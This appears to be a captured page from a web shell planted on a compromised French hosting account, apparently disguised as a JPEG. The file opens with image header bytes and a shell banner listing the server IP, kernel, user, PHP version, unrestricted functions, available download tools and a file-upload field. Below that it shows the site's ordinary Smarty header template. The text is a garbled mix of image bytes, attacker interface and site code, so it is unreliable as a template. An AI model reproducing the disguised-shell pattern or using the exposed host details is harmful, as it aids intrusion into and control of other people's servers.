ÿØÿà JFIF ` ` ÿþxØ
| Server IP : 109.234.164.53 / Your IP : 216.73.216.136 Web Server : Apache System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64 User : computer3 ( 1098) PHP Version : 7.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/computer3/atlanticswim.fr/business/business/ |
Upload File : |
{if $avertissement_on > 0 and $avertissement_popup == '1'}
<body onload="window.location.href='#popup_index';">
{else}
<body>
{/if}
<img src="includes/stats.php?ref='{$stats}'" alt="" style="position: absolute; top : -1000px; opacity: 0;"/>
<header id="header"> {include file="navbar.tpl"} {if $navigateur == '100'}
<div class="navigateur">
ATTENTION ! Votre navigateur ne prend pas en charge les CSS3, le site est donc dans une configuration minimum (déconseillé). <br/> Cliquez sur les liens suivants : <a href="http://windows.microsoft.com/fr-fr/internet-explorer/download-ie"><b>Mise à jour Internet Explorer</a></b> ou <a href="http://www.mozilla-europe.org/fr/firefox/"><b>Installation de Firefox</b></a>
</div>
{/if}
<div class="top-bar">
<div class="topsite" style="">
<div class="container">
<div class="row">
<div class="col-xs-0 col-sm-2 col-md-6 col-lg-6 col-md-6">
<div class="top-number">
{if $telephone !==""}<i class="fa fa-phone-square"></i> {$telephone}{/if}
</div>
</div>
<div class="col-xs-12 col-sm-10 col-md-6 col-lg-6 col-md-6">
<div class="social">
<ul class="social-share">
{if $facebook_on == 1}
<li><a href="{$facebook}" title="Facebook"><i class="fa fa-facebook"></i></a></li>
{/if} {if $twitter_on == 1}
<li><a href="{$twitter}" title="Twitter"><i class="fa fa-twitter"></i></a></li>
{/if} {if $pinterest_on == 1}
<li><a href="{$pinterest}" title="Pinterest"><i class="fa fa-pinterest"></i></a></li>
{/if} {if $googleplus_on == 1}
<li><a href="{$googleplus}" title="Google +"><i class="fa fa-google-plus-square"></i></a></li>
{/if} {if $linkedin_on == 1}
<li><a href="{$linkedin}" title="Linkedin"><i class="fa fa-linkedin"></i></a></li>
{/if} {if $skype_on == 1}
<li><a href="{$skype}" title="Skype"><i class="fa fa-skype"></i></a></li>
{/if}
</ul>
{if $search_on != '0'}
<div class="search">
<form action="search.php">
<input type="text" name="search" class="search-form" autocomplete="off" placeholder="{$search_label}">
<i class="fa fa-search"></i>
</form>
</div>
{/if}
</div>
</div>
</div>
</div>
</div>
</div>
<div class="container">
<div class="row">
<!-- LOGO -->
<div class="no_1024">
<div id="logo">
{if $Image_Logo_hover !== ''}
<a class="img-responsive" href="accueil"><img src="{$url_site}/{$theme_actif}images/{$Image_Logo}" alt="{$site_name}" title="{$site_name}" onmouseover="this.src='{$url_site}/{$theme_actif}images/{$Image_Logo_hover}'" onmouseout="this.src='{$url_site}/{$theme_actif}images/{$Image_Logo}'"></a>
{else}
<a class="img-responsive" href="accueil"><img src="{$url_site}/{$theme_actif}images/{$Image_Logo}" alt="{$site_name}"></a>
{/if}
</div>
</div>
<div class="yes_1024">
<div style="text-align:center">
<div id="_logo">
{if $Image_Logo_hover !== ''}
<a class="img-responsive" href="accueil"><img src="{$url_site}/{$theme_actif}images/{$Image_Logo}" alt="{$site_name}" title="{$site_name}" onmouseover="this.src='{$url_site}/{$theme_actif}images/{$Image_Logo_hover}'" onmouseout="this.src='{$url_site}/{$theme_actif}images/{$Image_Logo}'"></a>
{else}
<a class="img-responsive" href="accueil"><img src="{$url_site}/{$theme_actif}images/{$Image_Logo}" alt="{$site_name}"></a>
{/if}
</div>
</div>
</div>
<!-- PUB ou COORDONNEES -->
{if $advert < 1 } <div class="no_1024">
<div class="coordonnees" style="position: absolute; background:transparent">
<span><b>{$societe}</b>
<br/>
{$adresse} {$code_postal} - {$ville}
</span>
<br/><span>
<b>Tél. : {$telephone}</b></span>
<br/>
{if $slogan_on >0 AND $slogan_ste !=''}<span class="slogan">{$slogan_ste}</span>{/if}
</div>
</div>
{/if}
</div>
<div id="pub_head">
{if $advertisings_on == 1} {include file="Advertising.tpl"} {/if}
</div>
</div>
<!--/.row-->
<!--/.container-->
<!--top-bar-->
<nav class="navbar navbar-inverse navbar-default" style="{$style_container2}">
<div class="containerp" style="width:100%">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
{if $menu_center >0}
<div class="no_1200" style=" white-space: nowrap;width:{$comp_col}px; margin-left:auto; margin-right:auto; text-align:center">
<div class="navbar-collapse collapse">
<div class="nav navbar-nav">
{$menu}
</div>
</div>
</div>
<div class="yes_1200" style="">
<div class="navbar-collapse collapse">
<div class="nav navbar-nav">
{$menu}
</div>
</div>
</div>
{else}
<div class="navbar-collapse collapse">
<div class="nav navbar-nav">
{$menu}
</div>
</div>
{/if}
</div>
</div>
</nav>
<div class="clearfix">
</div>
<!--/.top-bar-->
<!--/header-->
{if $loupe_on > 0}
<div class="aide-nav no_800">
<ul class="outils">
<li><a href="accueil?tail=1" class="" title="Normal">A <span style="color:transparent;"><i class="fa fa-square-o" aria-hidden="true"></i></span></a></li>
<li><a href="accueil?tail=2" class="" title="Augmenter">A <span style="font-size: 10px;"><i class="fa fa-plus" aria-hidden="true"></i></span></a></li>
<!-- <li><a href="#" onclick="window.print();" class="" title="Imprimer"><span style="font-size: 18px;"><i class="fa fa-print" aria-hidden="true"></i></span></a></li> -->
</ul>
</div>
{/if} {if $reseaux_type =='1'}
<div class="no_1024">
<div class="vertical_reseauG">
{if $rappel_on == '1'}
<div class="appel-verticalG no_1024">
<ul class="outils">
<li style="color:#fff;"><a title="Rappelez-moi" href="rappel/rappel.php?email_rappel={$email_rappel}&company={$lasociete}" data-lity><span style="white-space: nowrap;font-weight:bold;font-size:12pt"><b>{$rappelezmoi} <i class="fa fa-phone-square fa-2x"></i></b><u><i class="fa fa-phone-square fa-2x"></i></u></span></a></li>
</ul>
</div>
{/if}
<div class="fb-verticalG no_1024">
<ul class="outils">
<li><a target="_blank" title="Partager sur Facebook" href="https://www.facebook.com/sharer.php?u={$adresse_url}/{if isset($share_seo)}{$share_seo}{else}{$page.seo}{/if}&text={if isset($share_name)}{$share_name}{else}{$page.name}{/if}">
<span style="white-space: nowrap;color :#3B5997;font-weight:bold;font-size:12pt"><b>{$partagermoi} <i class="fa fa-facebook-square fa-2x"></i></b><u><i class="fa fa-facebook-square fa-2x"></i></u></span></a></li>
</ul>
</div>
<div class="tw-verticalG no_1024">
<ul class="outils">
<li><a target="_blank" title="Partager sur Twitter" href="https://twitter.com/share?url={$adresse_url}/{if isset($share_seo)}{$share_seo}{else}{$page.seo}{/if}&text={if isset($share_name)}{$share_name}{else}{$page.name}{/if}"><span style="white-space: nowrap;color :#55ACEE;font-weight:bold;font-size:12pt"><b>{$partagermoi} <i class="fa fa-twitter-square fa-2x"></i></b><u><i class="fa fa-twitter-square fa-2x"></i></u></span></a></li>
</ul>
</div>
<div class="gg-verticalG no_1024">
<ul class="outils">
<li><a target="_blank" title="Partager sur Google +" href="https://plus.google.com/share?url={$adresse_url}/{if isset($share_seo)}{$share_seo}{else}{$page.seo}{/if}&text={if isset($share_name)}{$share_name}{else}{$page.name}{/if}&hl=fr"><span style="white-space: nowrap;color :#DD4B39;font-weight:bold;font-size:12pt"><b>{$partagermoi} <i class="fa fa-google-plus-square fa-2x"></i></b><u><i class="fa fa-google-plus-square fa-2x"></i></u></span></a></li>
</ul>
</div>
<div class="in-verticalG no_1024">
<ul class="outils">
<li><a target="_blank" title="Partager sur Linkedin" href="https://www.linkedin.com/shareArticle?mini=true&url={$adresse_url}/{if isset($share_seo)}{$share_seo}{else}{$page.seo}{/if}&text={if isset($share_name)}{$share_name}{else}{$page.name}{/if}"><span style="white-space: nowrap;color :#0976B4;font-weight:bold;font-size:12pt"><b>{$partagermoi} <i class="fa fa-linkedin-square fa-2x"></i></b><u><i class="fa fa-linkedin-square fa-2x"></i></u></span></a></li>
</ul>
</div>
<div class="pi-verticalG no_1024">
<ul class="outils">
<li><a target="_blank" title="Partager sur Pinterest" href="http://pinterest.com/pin/create/button/?url={$adresse_url}/{if isset($share_seo)}{$share_seo}{else}{$page.seo}{/if}&text={if isset($share_name)}{$share_name}{else}{$page.name}{/if}"><span style="white-space: nowrap;color :#BD2125;font-weight:bold;font-size:12pt"><b>{$partagermoi} <i class="fa fa-pinterest-square fa-2x"></i></b><u><i class="fa fa-pinterest-square fa-2x"></i></u></span></a></li>
</ul>
</div>
</div>
</div>
{/if} {if $reseaux_type =='2'}
<div class="no_1024">
<div class="vertical_reseau">
{if $rappel_on == '1'}
<div class="appel-vertical no_1024">
<ul class="outils">
<li style="color:#fff;"><a href="rappel/rappel.php?email_rappel={$email_rappel}&company={$lasociete}" title="Rappelez-moi" data-lity><span style="white-space: nowrap;font-weight:bold;font-size:12pt"><i class="fa fa-phone-square fa-2x"></i> {$rappelezmoi}</span></a></li>
</ul>
</div>
{/if}
<div class="fb-vertical no_1024">
<ul class="outils">
<li><a target="_blank" title="Partager sur Facebook" href="https://www.facebook.com/sharer.php?u={$adresse_url}/{if isset($share_seo)}{$share_seo}{else}{$page.seo}{/if}&text={if isset($share_name)}{$share_name}{else}{$page.seo}{/if}">
<span style="white-space: nowrap;color :#3B5997;font-weight:bold;font-size:12pt"><i class="fa fa-facebook-square fa-2x"></i> {$partagermoi}</span></a></li>
</ul>
</div>
<div class="tw-vertical no_1024">
<ul class="outils">
<li><a target="_blank" title="Partager sur Twitter" href="https://twitter.com/share?url={$adresse_url}/{if isset($share_seo)}{$share_seo}{else}{$page.seo}{/if}&text={if isset($share_name)}{$share_name}{else}{$page.name}{/if}">
<span style="white-space: nowrap;color :#55ACEE;font-weight:bold;font-size:12pt"><i class="fa fa-twitter-square fa-2x"></i> {$partagermoi}</span></a></li>
</ul>
</div>
<div class="gg-vertical no_1024">
<ul class="outils">
<li><a target="_blank" title="Partager sur Google +" href="https://plus.google.com/share?url={$adresse_url}/{if isset($share_seo)}{$share_seo}{else}{$page.seo}{/if}&text={if isset($share_name)}{$share_name}{else}{$page.name}{/if}&hl=fr">
<span style="white-space: nowrap;color :#DD4B39;font-weight:bold;font-size:12pt"><i class="fa fa-google-plus-square fa-2x"></i> {$partagermoi}</span></a></li>
</ul>
</div>
<div class="in-vertical no_1024">
<ul class="outils">
<li><a target="_blank" title="Partager sur Linkedin" href="https://www.linkedin.com/shareArticle?mini=true&url={$adresse_url}/{if isset($share_seo)}{$share_seo}{else}{$page.seo}{/if}&text={if isset($share_name)}{$share_name}{else}{$page.name}{/if}">
<span style="white-space: nowrap;color :#0976B4;font-weight:bold;font-size:12pt"><i class="fa fa-linkedin-square fa-2x"></i> {$partagermoi}</span></a></li>
</ul>
</div>
<div class="pi-vertical no_1024">
<ul class="outils">
<li><a target="_blank" title="Partager sur Pinterest" href="http://pinterest.com/pin/create/button/?url={$adresse_url}/{if isset($share_seo)}{$share_seo}{else}{$page.seo}{/if}&text={if isset($share_name)}{$share_name}{else}{$page.name}{/if}">
<span style="white-space: nowrap;color :#BD2125;font-weight:bold;font-size:12pt"><i class="fa fa-pinterest-square fa-2x"></i> {$partagermoi}</span></a></li>
</ul>
</div>
</div>
</div>
{/if} {if $avertissement_on > 0 and $avertissement_popup == '1'} {include file="popup_index.tpl"} {/if} </div></header>